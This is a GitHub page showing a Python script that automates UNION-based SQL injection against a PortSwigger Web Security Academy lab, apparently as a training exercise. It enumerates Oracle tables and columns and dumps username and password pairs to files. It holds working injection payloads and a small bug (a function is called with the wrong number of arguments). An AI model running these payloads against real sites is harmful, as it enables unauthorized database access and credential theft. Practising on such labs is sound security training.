SQL-Injection/sqli.py at main · Th3FirstAvenger/SQL-Injection · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#!/usr/bin/env python3

import sys
import re
import requests
import signal

# Global vars
host= 'ac2a1f861fb1fc5080dc1b9700460076.web-security-academy.net'
url = 'https://{0}/filter'.format(host)


# Function Ctrl+C
def signal_handler(sig, frame):
    print('\n[!] Saliendo ... ')
    sys.exit(1)
signal.signal(signal.SIGINT, signal_handler)

def sqli_requests(sqli):
    try:

        header = {
                    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
                    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
                }

        payload = {'category': sqli}

        r = requests.get(url, params=payload, headers=header)

        data = data_filter(r.text,r.url)

        return data

    except:
        print(r.url)
        print("Unexpected error:", sys.exc_info()[0])
        print ("Web content: ")
        return r.text


def data_filter(text):
        data_filter = re.findall(r'(?:<tbody>)([\s\S]*)(?:<\/tbody>)', text)
        data_filter = re.findall(r'(?<=>)(.*?)(?=<\/)', data_filter[0])

        if re.search(r'<p>Solved</p>', text):
            print ('Congratulations, you solved the lab!')

        return data_filter


def enum_tables(db_name):
    name = '../info/tables/ORACLE_db_tables_{0}.txt'.format(db_name)

    tables = open(name,'w')
    #ORACLE
    info_table = sqli_requests('\'UNION SELECT column_name,NULL FROM ALL_TAB_COLUMNS where table_name=\'{0}\'-- -'.format(db_name))
    #Postgres
#    info_table = sqli_requests('\'UNION SELECT column_name,NULL FROM information_schema.columns where table_name=\'{0}\'-- -'.format(db_name))

    extract_info = sqli_requests('\'UNION SELECT * from {0}-- -'.format(db_name))
    if extract_info != 'Internal Server Error':
        for i in range(0,len(extract_info),2):
            user = extract_info[i]
            passwd = extract_info[i+1]
            tables.write("{0} : {1}\n".format(user,passwd))
    tables.close()
    return info_table


def main():

    while True:
        option = input('[ manual (default) | enum (emumeration databases) ] Option: ')
        if option != 'exit':
            sqli=input("SQLI: ")
            data = sqli_requests(sqli)
            if option == 'enum':
                f=open('../info/databases/ORACLE_db_names.txt','w')
                for name in data:
                    if 'USER' in name:
                        f.write(name)
                        enum_tables(name)
                f.close()
            else:
                print(data)
        else:
            sys.exit(0)

if __name__ == "__main__":
    main()